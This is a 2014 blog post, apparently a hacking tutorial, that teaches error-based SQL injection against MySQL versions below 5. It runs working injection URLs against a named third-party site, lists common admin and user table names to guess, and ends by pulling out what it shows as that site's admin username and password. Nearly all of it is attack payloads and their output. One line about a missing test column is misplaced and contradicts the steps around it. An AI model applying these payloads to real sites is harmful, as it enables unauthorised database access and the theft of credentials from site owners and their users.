Thursday, 29 May 2014

ERROR BASED INJECTION( FOR VERSION LESS THAN 5)


First off, this tutorial will be for sites that don't have information_schema, or versions less then 5.
Most people don't know you can still use error based for sites that don't have information_schema. Well, today I'm going to be showing you how to pull data.



Getting The Version
First off, let's find our site and check the version. I'll be using this site as an example.

Code:
http://ultimatehomedesign.com/news-detail.php?id=309

Now let's check our version, by using error based.

Code:
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

So my link looks like this.

Code:
http://ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+havin​g+min(0)+or+1--


As you can see, it returns the version which is less than 5 (took me forever to find the perfect site).

Guessing the Table Names


Now we want to start guessing our table names....here's a list of common ones.



Code:
admin
admins
tbl_admin
tbladmin
member
members
tbl_members
tblmembers
user
users
tbl_users
tblusers
wp_users

So basically when we guess our table names, your syntax should look like this.
Code:
+or+1+group+by+concat_ws(0x7e,(select+1+from+TABLEGUESS+limit+0,1),floor(rand(0)​*2))+having+min(0)+or+1--
Replace TABLEGUESS with your guess, of course.

So I'm going to guess the users table, but first I want to check and use a fake name so I can get my error.
Code:
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+1+from+TEST+limit+0,1),fl​oor(rand(0)*2))+having+min(0)+or+1--



I get my error that says, DATABASE.test doesn't exist, so there's no test table.

Now let's try the users table. If it exists, it should come back with a duplicate entry of 1.

Code:
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+1+from+users+limit+0,1),f​loor(rand(0)*2))+having+min(0)+or+1--

Code:
Duplicate entry '1~1' for key 1


Guessing The Column Names

Now we need to guess our column name, so let's guess test again.

Our syntax would look something like this.


Code:
+or+1+group+by+concat_ws(0x7e,(select+COLUMNGUESS+from+TABLENAME+limit+0,1),floo​r(rand(0)*2))+having+min(0)+or+1--

So let's guess the test column, from the users table.

Code:
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+test+from+users+limit+0,1​),floor(rand(0)*2))+having+min(0)+or+1--

Code:
Unknown column 'test' in 'field list'


Let's guess username, from the users table.

Code:
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_name+from+users+limi​t+0,1),floor(rand(0)*2))+having+min(0)+or+1--

The site didn't come back with an error, it loaded fine so that column exists.
Now let's guess the password column...

Code:
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_pass+from+users+limi​t+0,1),floor(rand(0)*2))+having+min(0)+or+1--
Once again, the site loaded fine...so those are our two columns. Now let's try and concatenate them, and get our duplicate entry for the data in them.

Getting Data Out Of Columns


Now that we got our column names, we want to get the data out of them.

The code looks like this.
Code:
+or+1+group+by+concat_ws(0x7e,(select+concat(column1,0x7e,column2)+from+TABLENAM​E+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--

So my link looks like this..

Code:
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+concat(user_name,0x7e,use​r_pass)+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--

The site loaded fine, which sucks. We wanted a duplicate entry error, with our data. But now that we have the info we needed, we can go for plan B and get it with some advanced double query.

The code looks like this.

Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(co​lumn1,0x7e,column2)+as+char),0x7e))+from+TABLENAME+limit+0,1),floor(rand(0)*2))x​+from+TABLENAME+group+by+x)a)

So let's try it out..

Code:
http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+conc​at(cast(concat(user_name,0x7e,user_pass)+as+char),0x7e))+from+users+limit+0,1),f​loor(rand(0)*2))x+from+users+group+by+x)a)

We got our error, so there is no test column in the users table..



Woot, we get an error. Subquery returns more then 1 row, so now we need to use substring and get them 1 by 1.
Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(su​bstring(column1,STARTLENGTH,ENDLENTH))+as+char),0x7e))+from+TABLENAME+limit+0,1)​,floor(rand(0)*2))x+from+TABLENAME+group+by+x)a)

So my link looks like this..

Code:
http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+conc​at(cast(concat(substring(user_name,1,25))+as+char),0x7e))+from+users+limit+0,1),​floor(rand(0)*2))x+from+users+group+by+x)a)

Code:
Duplicate entry 'root~1' for key 1

Now that we got the username, let's get the password.

Code:
http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+conc​at(cast(concat(substring(user_pass,1,25))+as+char),0x7e))+from+users+limit+0,1),​floor(rand(0)*2))x+from+users+group+by+x)a)

Code:
Duplicate entry 'trump123~1' for key 1

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)